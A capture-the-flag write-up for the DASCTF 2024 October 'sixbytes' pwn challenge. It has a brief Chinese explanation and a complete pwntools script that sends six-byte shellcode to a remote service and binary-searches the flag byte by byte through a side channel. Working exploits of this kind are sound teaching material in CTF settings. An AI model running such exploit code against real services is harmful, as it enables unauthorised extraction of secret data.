DASCTF 2024金秋十月|秋意浓,战火燃,码上见真章

PWN

  • sixbytes
  • usersys (复现)
  • ChromeLogger (复现)

sixbytes

6个字节的shellcode

最开始爆3不出来, 后面调试了下可以发现是因为idx为和不为0的时候跳转的循环地址不同, 直接跳过flag头开爆

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
#!/usr/bin/env python3

# -*-coding:utf-8 -*-

from pwn import*

from ctypes import *

from LibcSearcher import *

  

io_ch=0

de_bug=0

url='node5.buuoj.cn'

port=25036

arch='amd64'

filename='./pwn'

context(log_level = 'debug',os='linux',arch=arch)

context.terminal = ['tmux','splitw','-h']

if io_ch==1:

    io=remote(url,port)

else:

    pass

    #io=process(["qemu-aarch64-static","-g","1234","./pwn"])

    io=process(filename)

    if de_bug==1:

        gdb.attach(io)

if filename!='':

    elf=ELF(filename)

    #libc=ELF('./libc.so.6')

# - - - - - - - - - - - - - #

s   = lambda content : io.send(content)

sl  = lambda content : io.sendline(content)

sa  = lambda content,send : io.sendafter(content, send)

sla = lambda content,send : io.sendlineafter(content, send)

rc  = lambda number : io.recv(number)

ru  = lambda content : io.recvuntil(content)

rcg = lambda : u64(rc(6).ljust(8, b'\x00'))

r_l = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')

r_l.srand(0)

# - - - - - - - - - - - - - #

shellcode = '''

cmp byte ptr [rdi+{}],{}

ja $-0x4

'''

# - - - - - - - - - - - - - #

  

# - - - - - - - - - - - - - #

def pwn_exp(i,j):

    print('PWN')

    sl(asm(shellcode.format(i,j)))

    #log.info('#---#---#---#---#')

    #libc=LibcSearcher("gets",gets_Addr);

    #log.success('libc.address:'+hex(libc.address))

    #log.success('elf.address:'+hex(elf.address))

if __name__=="__main__":

    flag = ''

    idx = 5

    l = 0x20

    r = 0x80

    while True:

        sleep(0.5)

        mid = (l + r) // 2

        print(l,mid,r)

        io=remote(url,port)

        try:

            pwn_exp(idx, mid)

            io.recvuntil('\n',timeout=1)

            #小于

            l = mid+1

            print("DDD")

            io.close()

        except:

            #等于大于

            r = mid

            print("EEE")

            io.close()

        if l == r:

            flag += chr(l)

            idx += 1

            if chr(l) == '}':

                print(flag)

                exit()

            l = 0x20

            r = 0x80